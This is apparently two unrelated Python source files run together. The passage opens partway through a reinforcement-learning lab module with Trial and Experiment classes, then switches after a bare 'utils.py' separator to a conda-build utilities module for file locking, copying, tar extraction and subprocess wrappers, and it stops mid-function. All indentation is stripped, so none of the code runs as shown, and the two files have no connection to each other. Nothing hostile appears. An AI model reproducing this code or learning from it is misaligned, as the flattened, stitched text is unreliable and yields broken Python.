w = mp.Process(target=self.mp_runner, args=(deepcopy(self.spec), deepcopy(self.info_space), global_nets))
w.start()
workers.append(w)
for w in workers:
w.join()
session_datas = analysis.session_data_dict_for_dist(self.spec, self.info_space)
return session_datas
def run_sessions(self):
logger.info('Running sessions')
if util.get_lab_mode() in ('train', 'eval') and self.spec['meta']['max_session'] > 1:
# when training a single spec over multiple sessions
session_datas = self.parallelize_sessions()
else:
session_datas = []
for _s in range(self.spec['meta']['max_session']):
self.info_space.tick('session')
session = self.SessionClass(deepcopy(self.spec), deepcopy(self.info_space))
session_data = session.run()
session_datas.append(session_data)
if analysis.is_unfit(session_data, session):
break
return session_datas
def make_global_nets(self, agent):
global_nets = {}
for net_name in agent.algorithm.net_names:
g_net = getattr(agent.algorithm, net_name)
g_net.share_memory() # make net global
# TODO also create shared optimizer here
global_nets[net_name] = g_net
return global_nets
def init_global_nets(self):
session = self.SessionClass(deepcopy(self.spec), deepcopy(self.info_space))
if self.is_singleton:
session.env.close() # safety
global_nets = self.make_global_nets(session.agent)
else:
session.env_space.close() # safety
global_nets = [self.make_global_nets(agent) for agent in session.agent_space.agents]
return global_nets
def run_distributed_sessions(self):
logger.info('Running distributed sessions')
global_nets = self.init_global_nets()
session_datas = self.parallelize_sessions(global_nets)
return session_datas
def close(self):
logger.info('Trial done and closed.')
def run(self):
if self.spec['meta'].get('distributed'):
session_datas = self.run_distributed_sessions()
else:
session_datas = self.run_sessions()
self.session_data_dict = {data.index[0]: data for data in session_datas}
self.data = analysis.analyze_trial(self)
self.close()
return self.data
class Experiment:
'''
The core high level unit of Lab.
Given a spec-space/generator of cardinality t,
a number s,
a hyper-optimization algorithm hopt(spec, fitness-metric) -> spec_next/null
experiment creates and runs up to t trials of s sessions each to optimize (maximize) the fitness metric,
gather the trial data,
then return the experiment data for analysis and use in evolution graph.
Experiment data will include the trial data, notes on design, hypothesis, conclusion, analysis data, e.g. fitness metric, evolution link of ancestors to potential descendants.
An experiment then forms a node containing its data in the evolution graph with the evolution link and suggestion at the adjacent possible new experiments
On the evolution graph level, an experiment and its neighbors could be seen as test/development of traits.
'''
def __init__(self, spec, info_space):
self.spec = spec
self.info_space = info_space
self.index = self.info_space.get('experiment')
util.set_logger(self.spec, self.info_space, logger, 'trial')
self.trial_data_dict = {}
self.data = None
analysis.save_spec(spec, info_space, unit='experiment')
SearchClass = getattr(search, spec['meta'].get('search'))
self.search = SearchClass(self)
logger.info(f'Initialized experiment {self.index}')
def init_trial_and_run(self, spec, info_space):
'''
Method to run trial with the properly updated info_space (trial_index) from experiment.search.lab_trial.
'''
trial = Trial(spec, info_space)
trial_data = trial.run()
return trial_data
def close(self):
reload(search) # fixes ray consecutive run crashing due to bad cleanup
logger.info('Experiment done and closed.')
def run(self):
self.trial_data_dict = self.search.run()
self.data = analysis.analyze_experiment(self)
self.close()
return self.data
|
utils.py | from __future__ import absolute_import, division, print_function
from collections import OrderedDict, defaultdict
import contextlib
import fnmatch
import hashlib
import json
from locale import getpreferredencoding
import libarchive
import logging
import logging.config
import mmap
import operator
import os
from os.path import (dirname, getmtime, getsize, isdir, join, isfile, abspath, islink,
expanduser, expandvars)
import re
import stat
import subprocess
import sys
import shutil
import tarfile
import tempfile
from threading import Thread
import time
try:
from json.decoder import JSONDecodeError
except ImportError:
JSONDecodeError = ValueError
import yaml
import filelock
import conda_package_handling.api
try:
from conda.base.constants import CONDA_TARBALL_EXTENSIONS
except Exception:
from conda.base.constants import CONDA_TARBALL_EXTENSION
CONDA_TARBALL_EXTENSIONS = (CONDA_TARBALL_EXTENSION,)
from conda.api import PackageCacheData
from .conda_interface import hashsum_file, md5_file, unix_path_to_win, win_path_to_unix
from .conda_interface import PY3, iteritems
from .conda_interface import root_dir, pkgs_dirs
from .conda_interface import string_types
from .conda_interface import memoized
from .conda_interface import StringIO
from .conda_interface import VersionOrder, MatchSpec
from .conda_interface import cc_conda_build
from .conda_interface import conda_43, conda_46, Dist
from .conda_interface import context
from .conda_interface import download, TemporaryDirectory, get_conda_channel, CondaHTTPError
# NOQA because it is not used in this file.
from conda_build.conda_interface import rm_rf as _rm_rf # NOQA
from conda_build.exceptions import BuildLockError
from conda_build.os_utils import external
if PY3:
from glob import glob as glob_glob
# stdlib glob is less feature-rich but considerably faster than glob2
def glob(pathname, recursive=True):
return glob_glob(pathname, recursive=recursive)
import urllib.parse as urlparse
import urllib.request as urllib
# NOQA because it is not used in this file.
from contextlib import ExitStack # NOQA
PermissionError = PermissionError # NOQA
FileNotFoundError = FileNotFoundError
else:
from glob2 import glob as glob2_glob
def glob(pathname, recursive=True):
return glob2_glob(pathname, recursive=recursive)
import urlparse
import urllib
# NOQA because it is not used in this file.
from contextlib2 import ExitStack # NOQA
PermissionError = OSError
FileNotFoundError = OSError
on_win = (sys.platform == 'win32')
codec = getpreferredencoding() or 'utf-8'
on_win = sys.platform == "win32"
root_script_dir = os.path.join(root_dir, 'Scripts' if on_win else 'bin')
mmap_MAP_PRIVATE = 0 if on_win else mmap.MAP_PRIVATE
mmap_PROT_READ = 0 if on_win else mmap.PROT_READ
mmap_PROT_WRITE = 0 if on_win else mmap.PROT_WRITE
DEFAULT_SUBDIRS = {
"linux-64",
"linux-32",
"linux-ppc64le",
"linux-armv6l",
"linux-armv7l",
"linux-aarch64",
"win-64",
"win-32",
"osx-64",
"zos-z",
"noarch",
}
PY_TMPL = """
# -*- coding: utf-8 -*-
import re
import sys
from %(module)s import %(import_name)s
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(%(func)s())
"""
try:
from os import scandir, walk # NOQA
except ImportError:
from scandir import walk
@memoized
def stat_file(path):
return os.stat(path)
def directory_size_slow(path):
total_size = 0
seen = set()
for root, _, files in walk(path):
for f in files:
try:
stat = stat_file(os.path.join(root, f))
except OSError:
continue
if stat.st_ino in seen:
continue
seen.add(stat.st_ino)
total_size += stat.st_size
return total_size
def directory_size(path):
'''
'''
try:
if on_win:
command = 'dir /s "{}"' # Windows path can have spaces
out = subprocess.check_output(command.format(path), shell=True)
else:
command = "du -s {}"
out = subprocess.check_output(command.format(path).split(), stderr=subprocess.PIPE)
if hasattr(out, 'decode'):
try:
out = out.decode(errors='ignore')
# This isn't important anyway so give up. Don't try search on bytes.
except (UnicodeDecodeError, IndexError):
if on_win:
return 0
else:
pass
if on_win:
# Windows can give long output, we need only 2nd to last line
out = out.strip().rsplit('\r\n', 2)[-2]
pattern = "\s([\d\W]+).+" # Language and punctuation neutral
out = re.search(pattern, out.strip()).group(1).strip()
out = out.replace(',', '').replace('.', '').replace(' ', '')
else:
out = out.split()[0]
except subprocess.CalledProcessError:
out = directory_size_slow(path)
try:
return int(out) # size in bytes
except ValueError:
return 0
class DummyPsutilProcess(object):
def children(self, *args, **kwargs):
return []
def _setup_rewrite_pipe(env):
"""Rewrite values of env variables back to $ENV in stdout
Takes output on the pipe and finds any env value
and rewrites it as the env key
Useful for replacing "~/conda/conda-bld/pkg_<date>/_h_place..." with "$PREFIX"
Returns an FD to be passed to Popen(stdout=...)
"""
# replacements is the env dict reversed,
# ordered by the length of the value so that longer replacements
# always occur first in case of common prefixes
replacements = OrderedDict()
for k, v in sorted(env.items(), key=lambda kv: len(kv[1]), reverse=True):
replacements[v] = k
r_fd, w_fd = os.pipe()
r = os.fdopen(r_fd, 'rt')
if sys.platform == 'win32':
replacement_t = '%{}%'
else:
replacement_t = '${}'
def rewriter():
while True:
try:
line = r.readline()
if not line:
# reading done
r.close()
os.close(w_fd)
return
for s, key in replacements.items():
line = line.replace(s, replacement_t.format(key))
sys.stdout.write(line)
except UnicodeDecodeError:
try:
txt = os.read(r, 10000)
sys.stdout.write(txt or '')
except TypeError:
pass
t = Thread(target=rewriter)
t.daemon = True
t.start()
return w_fd
class PopenWrapper(object):
# Small wrapper around subprocess.Popen to allow memory usage monitoring
# copied from ProtoCI, https://github.com/ContinuumIO/ProtoCI/blob/59159bc2c9f991fbfa5e398b6bb066d7417583ec/protoci/build2.py#L20 # NOQA
def __init__(self, *args, **kwargs):
self.elapsed = None
self.rss = 0
self.vms = 0
self.returncode = None
self.disk = 0
self.processes = 1
self.out, self.err = self._execute(*args, **kwargs)
def _execute(self, *args, **kwargs):
try:
import psutil
psutil_exceptions = psutil.NoSuchProcess, psutil.AccessDenied, psutil.NoSuchProcess
except ImportError as e:
psutil = None
psutil_exceptions = (OSError, ValueError)
log = get_logger(__name__)
log.warn("psutil import failed. Error was {}".format(e))
log.warn("only disk usage and time statistics will be available. Install psutil to "
"get CPU time and memory usage statistics.")
# The polling interval (in seconds)
time_int = kwargs.pop('time_int', 2)
disk_usage_dir = kwargs.get('cwd', sys.prefix)
# Create a process of this (the parent) process
parent = psutil.Process(os.getpid()) if psutil else DummyPsutilProcess()
cpu_usage = defaultdict(dict)
# Using the convenience Popen class provided by psutil
start_time = time.time()
_popen = psutil.Popen(*args, **kwargs) if psutil else subprocess.Popen(*args, **kwargs)
try:
while self.returncode is None:
# We need to get all of the children of our process since our
# process spawns other processes. Collect all of the child
# processes
rss = 0
vms = 0
processes = 0
# We use the parent process to get mem usage of all spawned processes
for child in parent.children(recursive=True):
child_cpu_usage = cpu_usage.get(child.pid, {})
try:
mem = child.memory_info()
rss += mem.rss
vms += mem.rss
# listing child times are only available on linux, so we don't use them.
# we are instead looping over children and getting each individually.
# https://psutil.readthedocs.io/en/latest/#psutil.Process.cpu_times
cpu_stats = child.cpu_times()
child_cpu_usage['sys'] = cpu_stats.system
child_cpu_usage['user'] = cpu_stats.user
cpu_usage[child.pid] = child_cpu_usage
except psutil_exceptions:
# process already died. Just ignore it.
continue
processes += 1
# Sum the memory usage of all the children together (2D columnwise sum)
self.rss = max(rss, self.rss)
self.vms = max(vms, self.vms)
self.cpu_sys = sum(child['sys'] for child in cpu_usage.values())
self.cpu_user = sum(child['user'] for child in cpu_usage.values())
self.processes = max(processes, self.processes)
# Get disk usage
self.disk = max(directory_size(disk_usage_dir), self.disk)
time.sleep(time_int)
self.elapsed = time.time() - start_time
self.returncode = _popen.poll()
except KeyboardInterrupt:
_popen.kill()
raise
self.disk = max(directory_size(disk_usage_dir), self.disk)
self.elapsed = time.time() - start_time
return _popen.stdout, _popen.stderr
def __repr__(self):
return str({'elapsed': self.elapsed,
'rss': self.rss,
'vms': self.vms,
'disk': self.disk,
'processes': self.processes,
'cpu_user': self.cpu_user,
'cpu_sys': self.cpu_sys,
'returncode': self.returncode})
def _func_defaulting_env_to_os_environ(func, *popenargs, **kwargs):
if 'env' not in kwargs:
kwargs = kwargs.copy()
env_copy = os.environ.copy()
kwargs.update({'env': env_copy})
kwargs['env'] = {str(key): str(value) for key, value in kwargs['env'].items()}
_args = []
if 'stdin' not in kwargs:
kwargs['stdin'] = subprocess.PIPE
for arg in popenargs:
# arguments to subprocess need to be bytestrings
if sys.version_info.major < 3 and hasattr(arg, 'encode'):
arg = arg.encode(codec)
elif sys.version_info.major >= 3 and hasattr(arg, 'decode'):
arg = arg.decode(codec)
_args.append(str(arg))
stats = kwargs.get('stats')
if 'stats' in kwargs:
del kwargs['stats']
rewrite_stdout_env = kwargs.pop('rewrite_stdout_env', None)
if rewrite_stdout_env:
kwargs['stdout'] = _setup_rewrite_pipe(rewrite_stdout_env)
out = None
if stats is not None:
proc = PopenWrapper(_args, **kwargs)
if func == 'output':
out = proc.out.read()
if proc.returncode != 0:
raise subprocess.CalledProcessError(proc.returncode, _args)
stats.update({'elapsed': proc.elapsed,
'disk': proc.disk,
'processes': proc.processes,
'cpu_user': proc.cpu_user,
'cpu_sys': proc.cpu_sys,
'rss': proc.rss,
'vms': proc.vms})
else:
if func == 'call':
subprocess.check_call(_args, **kwargs)
else:
if 'stdout' in kwargs:
del kwargs['stdout']
out = subprocess.check_output(_args, **kwargs)
return out
def check_call_env(popenargs, **kwargs):
return _func_defaulting_env_to_os_environ('call', *popenargs, **kwargs)
def check_output_env(popenargs, **kwargs):
return _func_defaulting_env_to_os_environ('output', stdout=subprocess.PIPE,
*popenargs, **kwargs).rstrip()
def bytes2human(n):
# http://code.activestate.com/recipes/578019
# >>> bytes2human(10000)
# '9.8K'
# >>> bytes2human(100001221)
# '95.4M'
symbols = ('K', 'M', 'G', 'T', 'P', 'E', 'Z', 'Y')
prefix = {}
for i, s in enumerate(symbols):
prefix[s] = 1 << (i + 1) * 10
for s in reversed(symbols):
if n >= prefix[s]:
value = float(n) / prefix[s]
return '%.1f%s' % (value, s)
return "%sB" % n
def get_recipe_abspath(recipe):
"""resolve recipe dir as absolute path. If recipe is a tarball rather than a folder,
extract it and return the extracted directory.
Returns the absolute path, and a boolean flag that is true if a tarball has been extracted
and needs cleanup.
"""
# Don't use byte literals for paths in Python 2
if not PY3:
recipe = recipe.decode(getpreferredencoding() or 'utf-8')
if isfile(recipe):
if recipe.lower().endswith(decompressible_exts) or recipe.lower().endswith(CONDA_TARBALL_EXTENSIONS):
recipe_dir = tempfile.mkdtemp()
tar_xf(recipe, recipe_dir)
# At some stage the old build system started to tar up recipes.
recipe_tarfile = os.path.join(recipe_dir, 'info', 'recipe.tar')
if isfile(recipe_tarfile):
tar_xf(recipe_tarfile, os.path.join(recipe_dir, 'info'))
need_cleanup = True
else:
print("Ignoring non-recipe: %s" % recipe)
return (None, None)
else:
recipe_dir = abspath(os.path.join(os.getcwd(), recipe))
need_cleanup = False
if not os.path.exists(recipe_dir):
raise ValueError("Package or recipe at path {0} does not exist".format(recipe_dir))
return recipe_dir, need_cleanup
@contextlib.contextmanager
def try_acquire_locks(locks, timeout):
"""Try to acquire all locks.
If any lock can't be immediately acquired, free all locks.
If the timeout is reached withou acquiring all locks, free all locks and raise.
http://stackoverflow.com/questions/9814008/multiple-mutex-locking-strategies-and-why-libraries-dont-use-address-comparison
"""
t = time.time()
while (time.time() - t < timeout):
# Continuously try to acquire all locks.
# By passing a short timeout to each individual lock, we give other
# processes that might be trying to acquire the same locks (and may
# already hold some of them) a chance to the remaining locks - and
# hopefully subsequently release them.
try:
for lock in locks:
lock.acquire(timeout=0.1)
except filelock.Timeout:
# If we failed to acquire a lock, it is important to release all
# locks we may have already acquired, to avoid wedging multiple
# processes that try to acquire the same set of locks.
# That is, we want to avoid a situation where processes 1 and 2 try
# to acquire locks A and B, and proc 1 holds lock A while proc 2
# holds lock B.
for lock in locks:
lock.release()
else:
break
else:
# If we reach this point, we weren't able to acquire all locks within
# the specified timeout. We shouldn't be holding any locks anymore at
# this point, so we just raise an exception.
raise BuildLockError('Failed to acquire all locks')
try:
yield
finally:
for lock in locks:
lock.release()
# with each of these, we are copying less metadata. This seems to be necessary
# to cope with some shared filesystems with some virtual machine setups.
# See https://github.com/conda/conda-build/issues/1426
def _copy_with_shell_fallback(src, dst):
is_copied = False
for func in (shutil.copy2, shutil.copy, shutil.copyfile):
try:
func(src, dst)
is_copied = True
break
except (IOError, OSError, PermissionError):
continue
if not is_copied:
try:
subprocess.check_call('cp -a {} {}'.format(src, dst), shell=True,
stderr=subprocess.PIPE, stdout=subprocess.PIPE)
except subprocess.CalledProcessError as e:
if not os.path.isfile(dst):
raise OSError("Failed to copy {} to {}. Error was: {}".format(src, dst, e))
def get_prefix_replacement_paths(src, dst):
ssplit = src.split(os.path.sep)
dsplit = dst.split(os.path.sep)
while ssplit and ssplit[-1] == dsplit[-1]:
del ssplit[-1]
del dsplit[-1]
return os.path.join(*ssplit), os.path.join(*dsplit)
def copy_into(src, dst, timeout=900, symlinks=False, lock=None, locking=True, clobber=False):
"""Copy all the files and directories in src to the directory dst"""
log = get_logger(__name__)
if symlinks and islink(src):
try:
os.makedirs(os.path.dirname(dst))
except OSError:
pass
if os.path.lexists(dst):
os.remove(dst)
src_base, dst_base = get_prefix_replacement_paths(src, dst)
src_target = os.readlink(src)
src_replaced = src_target.replace(src_base, dst_base)
os.symlink(src_replaced, dst)
try:
st = os.lstat(src)
mode = stat.S_IMODE(st.st_mode)
os.lchmod(dst, mode)
except:
pass # lchmod not available
elif isdir(src):
merge_tree(src, dst, symlinks, timeout=timeout, lock=lock, locking=locking, clobber=clobber)
else:
if isdir(dst):
dst_fn = os.path.join(dst, os.path.basename(src))
else:
dst_fn = dst
if os.path.isabs(src):
src_folder = os.path.dirname(src)
else:
if os.path.sep in dst_fn:
src_folder = os.path.dirname(dst_fn)
if not os.path.isdir(src_folder):
os.makedirs(src_folder)
else:
src_folder = os.getcwd()
if os.path.islink(src) and not os.path.exists(os.path.realpath(src)):
log.warn('path %s is a broken symlink - ignoring copy', src)
return
if not lock and locking:
lock = get_lock(src_folder, timeout=timeout)
locks = [lock] if locking else []
with try_acquire_locks(locks, timeout):
# if intermediate folders not not exist create them
dst_folder = os.path.dirname(dst)
if dst_folder and not os.path.exists(dst_folder):
try:
os.makedirs(dst_folder)
except OSError:
pass
try:
_copy_with_shell_fallback(src, dst_fn)
except shutil.Error:
log.debug("skipping %s - already exists in %s",
os.path.basename(src), dst)
def move_with_fallback(src, dst):
try:
shutil.move(src, dst)
except PermissionError:
copy_into(src, dst)
try:
os.unlink(src)
except PermissionError:
log = get_logger(__name__)
log.debug("Failed to clean up temp path due to permission error: %s" % src)
# http://stackoverflow.com/a/22331852/1170370
def copytree(src, dst, symlinks=False, ignore=None, dry_run=False):
if not os.path.exists(dst):
os.makedirs(dst)
shutil.copystat(src, dst)
lst = os.listdir(src)
if ignore:
excl = ignore(src, lst)
lst = [x for x in lst if x not in excl]
# do not copy lock files
if '.conda_lock' in lst:
lst.remove('.conda_lock')
dst_lst = [os.path.join(dst, item) for item in lst]
if not dry_run:
for idx, item in enumerate(lst):
s = os.path.join(src, item)
d = dst_lst[idx]
if symlinks and os.path.islink(s):
if os.path.lexists(d):
os.remove(d)
os.symlink(os.readlink(s), d)
try:
st = os.lstat(s)
mode = stat.S_IMODE(st.st_mode)
os.lchmod(d, mode)
except:
pass # lchmod not available
elif os.path.isdir(s):
copytree(s, d, symlinks, ignore)
else:
_copy_with_shell_fallback(s, d)
return dst_lst
def merge_tree(src, dst, symlinks=False, timeout=900, lock=None, locking=True, clobber=False):
"""
Merge src into dst recursively by copying all files from src into dst.
Return a list of all files copied.
Like copytree(src, dst), but raises an error if merging the two trees
would overwrite any files.
"""
dst = os.path.normpath(os.path.normcase(dst))
src = os.path.normpath(os.path.normcase(src))
assert not dst.startswith(src), ("Can't merge/copy source into subdirectory of itself. "
"Please create separate spaces for these things.\n"
" src: {0}\n"
" dst: {1}".format(src, dst))
new_files = copytree(src, dst, symlinks=symlinks, dry_run=True)
existing = [f for f in new_files if isfile(f)]
if existing and not clobber:
raise IOError("Can't merge {0} into {1}: file exists: "
"{2}".format(src, dst, existing[0]))
locks = []
if locking:
if not lock:
lock = get_lock(src, timeout=timeout)
locks = [lock]
with try_acquire_locks(locks, timeout):
copytree(src, dst, symlinks=symlinks)
# purpose here is that we want *one* lock per location on disk. It can be locked or unlocked
# at any time, but the lock within this process should all be tied to the same tracking
# mechanism.
_lock_folders = (os.path.join(root_dir, 'locks'),
os.path.expanduser(os.path.join('~', '.conda_build_locks')))
def get_lock(folder, timeout=900):
fl = None
try:
location = os.path.abspath(os.path.normpath(folder))
except OSError:
location = folder
b_location = location
if hasattr(b_location, 'encode'):
b_location = b_location.encode()
# Hash the entire filename to avoid collisions.
lock_filename = hashlib.sha256(b_location).hexdigest()
if hasattr(lock_filename, 'decode'):
lock_filename = lock_filename.decode()
for locks_dir in _lock_folders:
try:
if not os.path.isdir(locks_dir):
os.makedirs(locks_dir)
lock_file = os.path.join(locks_dir, lock_filename)
with open(lock_file, 'w') as f:
f.write("")
fl = filelock.FileLock(lock_file, timeout)
break
except (OSError, IOError):
continue
else:
raise RuntimeError("Could not write locks folder to either system location ({0})"
"or user location ({1}). Aborting.".format(*_lock_folders))
return fl
def get_conda_operation_locks(locking=True, bldpkgs_dirs=None, timeout=900):
locks = []
bldpkgs_dirs = ensure_list(bldpkgs_dirs)
# locks enabled by default
if locking:
_pkgs_dirs = pkgs_dirs[:1]
locked_folders = _pkgs_dirs + list(bldpkgs_dirs)
for folder in locked_folders:
if not os.path.isdir(folder):
os.makedirs(folder)
lock = get_lock(folder, timeout=timeout)
locks.append(lock)
# lock used to generally indicate a conda operation occurring
locks.append(get_lock('conda-operation', timeout=timeout))
return locks
def relative(f, d='lib'):
assert not f.startswith('/'), f
assert not d.startswith('/'), d
d = d.strip('/').split('/')
if d == ['.']:
d = []
f = dirname(f).split('/')
if f == ['']:
f = []
while d and f and d[0] == f[0]:
d.pop(0)
f.pop(0)
return '/'.join(((['..'] * len(f)) if f else ['.']) + d)
# This is the lowest common denominator of the formats supported by our libarchive/python-libarchive-c
# packages across all platforms
decompressible_exts = ('.7z', '.tar', '.tar.bz2', '.tar.gz', '.tar.lzma', '.tar.xz',
'.tar.z', '.tar.zst', '.tgz', '.whl', '.zip', '.rpm', '.deb')
def _tar_xf_fallback(tarball, dir_path, mode='r:*'):
if tarball.lower().endswith('.tar.z'):
uncompress = external.find_executable('uncompress')
if not uncompress:
uncompress = external.find_executable('gunzip')
if not uncompress:
sys.exit("""\
uncompress (or gunzip) is required to unarchive .z source files.
""")
check_call_env([uncompress, '-f', tarball])
tarball = tarball[:-2]
if not PY3 and tarball.endswith('.tar.xz'):
unxz = external.find_executable('unxz')
if not unxz:
sys.exit("""\
unxz is required to unarchive .xz source files.
""")
check_call_env([unxz, '-f', '-k', tarball])
tarball = tarball[:-3]
t = tarfile.open(tarball, mode)
members = t.getmembers()
for i, member in enumerate(members, 0):
if os.path.isabs(member.name):
member.name = os.path.relpath(member.name, '/')
if not os.path.realpath(member.name).startswith(os.getcwd()):
member.name = member.name.replace("../", "")
if not os.path.realpath(member.name).startswith(os.getcwd()):
sys.exit("tarball contains unsafe path: " + member.name)
members[i] = member
if not PY3:
t.extractall(path=dir_path.encode(codec))
else:
t.extractall(path=dir_path)
t.close()
def tar_xf_file(tarball, entries):
from conda_build.utils import ensure_list
entries = ensure_list(entries)
if not os.path.isabs(tarball):
tarball = os.path.join(os.getcwd(), tarball)
result = None
n_found = 0
with libarchive.file_reader(tarball) as archive:
for entry in archive:
if entry.name in entries:
n_found += 1
for block in entry.get_blocks():
if result is None:
result = bytes(block)
else:
result += block
break
if n_found != len(entries):
raise KeyError()
return result
def tar_xf_getnames(tarball):
if not os.path.isabs(tarball):
tarball = os.path.join(os.getcwd(), tarball)
result = []
with libarchive.file_reader(tarball) as archive:
for entry in archive:
result.append(entry.name)
return result
def tar_xf(tarball, dir_path):
flags = libarchive.extract.EXTRACT_TIME | \
libarchive.extract.EXTRACT_PERM | \
libarchive.extract.EXTRACT_SECURE_NODOTDOT | \
libarchive.extract.EXTRACT_SECURE_SYMLINKS | \
libarchive.extract.EXTRACT_SECURE_NOABSOLUTEPATHS
if not os.path.isabs(tarball):
tarball = os.path.join(os.getcwd(), tarball)
try:
with tmp_chdir(dir_path):
libarchive.extract_file(tarball, flags)
except libarchive.exception.ArchiveError:
# try again, maybe we are on Windows and the archive contains symlinks
# https://github.com/conda/conda-build/issues/3351
# https://github.com/libarchive/libarchive/pull/1030
if tarball.endswith(('.tar', '.tar.gz', '.tgz', '.tar.bz2', '.tar.z', '.tar.xz')):
_tar_xf_fallback(tarball, dir_path)
else:
raise
def file_info(path):
return {'size': getsize(path),
'md5': md5_file(path),
'sha256': hashsum_file(path, 'sha256'),
'mtime': getmtime(path)}
# Taken from toolz
def groupby(key, seq):
""" Group a collection by a key function
>>> names = ['Alice', 'Bob', 'Charlie', 'Dan', 'Edith', 'Frank']
>>> groupby(len, names) # doctest: +SKIP
{3: ['Bob', 'Dan'], 5: ['Alice', 'Edith', 'Frank'], 7: ['Charlie']}
>>> iseven = lambda x: x % 2 == 0
>>> groupby(iseven, [1, 2, 3, 4, 5, 6, 7, 8]) # doctest: +SKIP
{False: [1, 3, 5, 7], True: [2, 4, 6, 8]}
Non-callable keys imply grouping on a member.
>>> groupby('gender', [{'name': 'Alice', 'gender': 'F'},
... {'name': 'Bob', 'gender': 'M'},
... {'name': 'Charlie', 'gender': 'M'}]) # doctest:+SKIP
{'F': [{'gender': 'F', 'name': 'Alice'}],
'M': [{'gender': 'M', 'name': 'Bob'},
{'gender': 'M', 'name': 'Charlie'}]}
See Also:
countby
"""
if not callable(key):
key = getter(key)
d = defaultdict(lambda: [].append)
for item in seq:
d[key(item)](item)
rv = {}
for k, v in iteritems(d):
rv[k] = v.__self__
return rv
def getter(index):
if isinstance(index, list):
if len(index) == 1:
index = index[0]
return lambda x: (x[index],)
elif index:
return operator.itemgetter(*index)
else:
return lambda x: ()
else:
return operator.itemgetter(index)
def comma_join(items):
"""
Like ', '.join(items) but with and
Examples:
>>> comma_join(['a'])
'a'
>>> comma_join(['a', 'b'])
'a and b'
>>> comma_join(['a', 'b', 'c])
'a, b, and c'
"""
return ' and '.join(items) if len(items) <= 2 else ', '.join(items[:-1]) + ', and ' + items[-1]
def safe_print_unicode(*args, **kwargs):
"""
prints unicode strings to stdout using configurable `errors` handler for
encoding errors
:param args: unicode strings to print to stdout
:param sep: separator (defaults to ' ')
:param end: ending character (defaults to '\n')
:param errors: error handler for encoding errors (defaults to 'replace')
"""
sep = kwargs.pop('sep', u' ')
end = kwargs.pop('end', u'\n')
errors = kwargs.pop('errors', 'replace')
if PY3:
func = sys.stdout.buffer.write
else:
func = sys.stdout.write
line = sep.join(args) + end
encoding = sys.stdout.encoding or 'utf8'
func(line.encode(encoding, errors))
def rec_glob(path, patterns):
result = []
for d_f in walk(path):
# ignore the .git folder
# if '.git' in d_f[0]:
# continue
m = []
for pattern in patterns:
m.extend(fnmatch.filter(d_f[2], pattern))
if m:
result.extend([os.path.join(d_f[0], f) for f in m])
return result
def convert_unix_path_to_win(path):
if external.find_executable('cygpath'):
cmd = "cygpath -w {0}".format(path)
if PY3:
path = subprocess.getoutput(cmd)
else:
path = subprocess.check_output(cmd.split()).rstrip().rstrip("\\")
else:
path = unix_path_to_win(path)
return path
def convert_win_path_to_unix(path):
if external.find_executable('cygpath'):
cmd = "cygpath -u {0}".format(path)
if PY3:
path = subprocess.getoutput(cmd)
else:
path = subprocess.check_output(cmd.split()).rstrip().rstrip("\\")
else:
path = win_path_to_unix(path)
return path
# Used for translating local paths into url (file://) paths
# http://stackoverflow.com/a/14298190/1170370
def path2url(path):
return urlparse.urljoin('file:', urllib.pathname2url(path))
def get_stdlib_dir(prefix, py_ver):
if sys.platform == 'win32':
lib_dir = os.path.join(prefix, 'Lib')
else:
lib_dir = os.path.join(prefix, 'lib')
python_folder = glob(os.path.join(lib_dir, 'python?.*'))
if python_folder:
lib_dir = os.path.join(lib_dir, python_folder[0])
else:
lib_dir = os.path.join(lib_dir, 'python{}'.format(py_ver))
return lib_dir
def get_site_packages(prefix, py_ver):
return os.path.join(get_stdlib_dir(prefix, py_ver), 'site-packages')
def get_build_folders(croot):
# remember, glob is not a regex.
return glob(os.path.join(croot, "*" + "[0-9]" * 10 + "*"))
def prepend_bin_path(env, prefix, prepend_prefix=False):
# bin_dirname takes care of bin on *nix, Scripts on win
env['PATH'] = join(prefix, bin_dirname) + os.pathsep + env['PATH']
if sys.platform == "win32":
env['PATH'] = join(prefix, "Library", "mingw-w64", "bin") + os.pathsep + \
join(prefix, "Library", "usr", "bin") + os.pathsep + os.pathsep + \
join(prefix, "Library", "bin") + os.pathsep + \
join(prefix, "Scripts") + os.pathsep + \
env['PATH']
prepend_prefix = True # windows has Python in the prefix. Use it.
if prepend_prefix:
env['PATH'] = prefix + os.pathsep + env['PATH']
return env
# not currently used. Leaving in because it may be useful for when we do things
# like load setup.py data, and we need the modules from some prefix other than
# the root prefix, which is what conda-build runs from.
@contextlib.contextmanager
def sys_path_prepended(prefix):
path_backup = sys.path[:]
if on_win:
sys.path.insert(1, os.path.join(prefix, 'lib', 'site-packages'))
else:
lib_dir = os.path.join(prefix, 'lib')
python_dir = glob(os.path.join(lib_dir, 'python[0-9\.]*'))
if python_dir:
python_dir = python_dir[0]
sys.path.insert(1, os.path.join(python_dir, 'site-packages'))
try:
yield
finally:
sys.path = path_backup
@contextlib.contextmanager
def path_prepended(prefix):
old_path = os.environ['PATH']
os.environ['PATH'] = prepend_bin_path(os.environ.copy(), prefix, True)['PATH']
try:
yield
finally:
os.environ['PATH'] = old_path
bin_dirname = 'Scripts' if sys.platform == 'win32' else 'bin'
entry_pat = re.compile('\s*([\w\-\.]+)\s*=\s*([\w.]+):([\w.]+)\s*$')
def iter_entry_points(items):
for item in items:
m = entry_pat.match(item)
if m is None:
sys.exit("Error cound not match entry point: %r" % item)
yield m.groups()
def create_entry_point(path, module, func, config):
import_name = func.split('.')[0]
pyscript = PY_TMPL % {
'module': module, 'func': func, 'import_name': import_name}
if on_win:
with open(path + '-script.py', 'w') as fo:
if os.path.isfile(os.path.join(config.host_prefix, 'python_d.exe')):
fo.write('#!python_d\n')
fo.write(pyscript)
copy_into(join(dirname(__file__), 'cli-{}.exe'.format(str(config.host_arch))),
path + '.exe', config.timeout)
else:
if os.path.islink(path):
os.remove(path)
with open(path, 'w') as fo:
if not config.noarch:
fo.write('#!%s\n' % config.host_python)
fo.write(pyscript)
os.chmod(path, 0o775)
def create_entry_points(items, config):
if not items:
return
bin_dir = join(config.host_prefix, bin_dirname)
if not isdir(bin_dir):
os.mkdir(bin_dir)
for cmd, module, func in iter_entry_points(items):
create_entry_point(join(bin_dir, cmd), module, func, config)
# Return all files in dir, and all its subdirectories, ending in pattern
def get_ext_files(start_path, pattern):
for root, _, files in walk(start_path):
for f in files:
if f.endswith(pattern):
yield os.path.join(root, f)
_posix_exes_cache = {}
def convert_path_for_cygwin_or_msys2(exe, path):
